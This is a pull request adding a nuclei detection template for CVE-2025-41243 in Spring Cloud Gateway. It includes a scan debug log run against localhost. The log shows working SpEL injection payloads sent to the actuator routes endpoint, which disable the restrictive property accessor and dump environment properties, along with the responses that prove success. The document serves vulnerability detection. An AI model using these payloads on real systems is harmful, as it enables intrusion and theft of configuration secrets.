### PR TITLE
Added CVE-2025-41243.yaml

### DIFF
--- a/http/cves/2025/CVE-2025-41243.yaml
+++ b/http/cves/2025/CVE-2025-41243.yaml
@@ -120,5 +120,5 @@ http:
       - type: dsl
         dsl:
           - 'status_code == 200'
-          - 'contains_all(body, "spring.cloud.gateway", "server.port", "RouteDefinitionRouteLocator")'
+          - 'contains_all(body, "spring.cloud.gateway","RouteDefinitionRouteLocator")'
         condition: and


### PR DESCRIPTION
Added CVE-2025-41243 details for Spring Cloud Gateway vulnerability, including description, severity, references, and HTTP flow examples.

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

https://github.com/spring-cloud/spring-cloud-gateway/ use tag: v3.1.9

Run this file
`spring-cloud-gateway-sample/src/main/java/org/springframework/cloud/gateway/sample/GatewaySampleApplication.java`

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

```
PS C:\Users\redmomn\Downloads\nuclei_3.4.10_windows_amd64> .\nuclei.exe -t .\CVE-2025-41243.yaml -u http://127.0.0.1:8080 -p http://127.0.0.1:9000 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[WRN] Found 22 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-41243] Dumped HTTP request for http://127.0.0.1:8080/actuator/gateway/routes/gsqUHXVn

POST /actuator/gateway/routes/gsqUHXVn HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Connection: close
Content-Length: 306
Content-Type: application/json
Accept-Encoding: gzip

{
  "id": "gsqUHXVn",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "value": "#{ @systemProperties['spring. cloud.gateway.restrictive-property-accessor.enabled'] = false}",
        "name": "cmd"
      }
    }
  ],
  "uri": "http://example.com",
  "order": 0
}
[DBG] [CVE-2025-41243] Dumped HTTP response http://127.0.0.1:8080/actuator/gateway/routes/gsqUHXVn

HTTP/1.1 201 Created
Connection: close
Content-Length: 0
Location: /routes/gsqUHXVn
Proxy-Connection: Close

[INF] [CVE-2025-41243] Dumped HTTP request for http://127.0.0.1:8080/actuator/gateway/refresh

POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: gzip

[DBG] [CVE-2025-41243] Dumped HTTP response http://127.0.0.1:8080/actuator/gateway/refresh

HTTP/1.1 200 OK
Connection: close
Content-Length: 0
Proxy-Connection: Close

[INF] [CVE-2025-41243] Dumped HTTP request for http://127.0.0.1:8080/actuator/gateway/routes/gsqUHXVn

GET /actuator/gateway/routes/gsqUHXVn HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2025-41243] Dumped HTTP response http://127.0.0.1:8080/actuator/gateway/routes/gsqUHXVn

HTTP/1.1 200 OK
Connection: close
Content-Length: 315
Content-Type: application/json
Proxy-Connection: Close

{"predicate":"RouteDefinitionRouteLocator$$Lambda/0x0000026d01520000","route_id":"gsqUHXVn","filters":["[[PrefixPath prefix = '/httpbin'], order = 1]","[[AddResponseHeader cmd = 'false'], order = 1]","[[AddResponseHeader X-Response-Default-Foo = 'Default-Bar'], order = 2]"],"uri":"http://example.com:80","order":0}
[CVE-2025-41243:dsl-1] [http] [critical] http://127.0.0.1:8080/actuator/gateway/routes/gsqUHXVn
[INF] [CVE-2025-41243] Dumped HTTP request for http://127.0.0.1:8080/actuator/gateway/routes/qNosIKDr

POST /actuator/gateway/routes/qNosIKDr HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Content-Length: 355
Content-Type: application/json
Accept-Encoding: gzip

{
  "id": "qNosIKDr",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "value": "#{ @environment.getPropertySources.?[#this.name matches '.*optional:classpath:.*' ][0].source.![{#this.getKey+'='+#this.getValue.toString}] }",
        "name": "cmd"
      }
    }
  ],
  "uri": "http://example.com",
  "order": 0
}
[DBG] [CVE-2025-41243] Dumped HTTP response http://127.0.0.1:8080/actuator/gateway/routes/qNosIKDr

HTTP/1.1 201 Created
Connection: close
Content-Length: 0
Location: /routes/qNosIKDr
Proxy-Connection: Close

[INF] [CVE-2025-41243] Dumped HTTP request for http://127.0.0.1:8080/actuator/gateway/refresh

POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: gzip

[DBG] [CVE-2025-41243] Dumped HTTP response http://127.0.0.1:8080/actuator/gateway/refresh

HTTP/1.1 200 OK
Connection: close
Content-Length: 0
Proxy-Connection: Close

[INF] [CVE-2025-41243] Dumped HTTP request for http://127.0.0.1:8080/actuator/gateway/routes/qNosIKDr

GET /actuator/gateway/routes/qNosIKDr HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2025-41243] Dumped HTTP response http://127.0.0.1:8080/actuator/gateway/routes/qNosIKDr

HTTP/1.1 200 OK
Connection: close
Content-Length: 1198
Content-Type: application/json
Proxy-Connection: Close

{"predicate":"RouteDefinitionRouteLocator$$Lambda/0x0000026d01520000","route_id":"qNosIKDr","filters":["[[PrefixPath prefix = '/httpbin'], order = 1]","[[AddResponseHeader cmd = 'test.uri=lb://httpbin,spring.jmx.enabled=false,spring.cloud.gateway.default-filters[0]=PrefixPath=/httpbin,spring.cloud.gateway.default-filters[1]=AddResponseHeader=X-Response-Default-Foo, Default-Bar,spring.cloud.gateway.routes[0].id=websocket_test,spring.cloud.gateway.routes[0].uri=ws://localhost:9000,spring.cloud.gateway.routes[0].order=9000,spring.cloud.gateway.routes[0].predicates[0]=Path=/echo,spring.cloud.gateway.routes[1].id=default_path_to_httpbin,spring.cloud.gateway.routes[1].uri=${test.uri},spring.cloud.gateway.routes[1].order=10000,spring.cloud.gateway.routes[1].predicates[0]=Path=/**,logging.level.org.springframework.cloud.gateway=TRACE,logging.level.org.springframework.http.server.reactive=DEBUG,logging.level.org.springframework.web.reactive=DEBUG,logging.level.reactor.ipc.netty=DEBUG,logging.level.reactor.netty=DEBUG,management.endpoints.web.exposure.include=*'], order = 1]","[[AddResponseHeader X-Response-Default-Foo = 'Default-Bar'], order = 2]"],"uri":"http://example.com:80","order":0}
[CVE-2025-41243:dsl-1] [http] [critical] http://127.0.0.1:8080/actuator/gateway/routes/qNosIKDr
[INF] Scan completed in 190.6409ms. 2 matches found.
```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)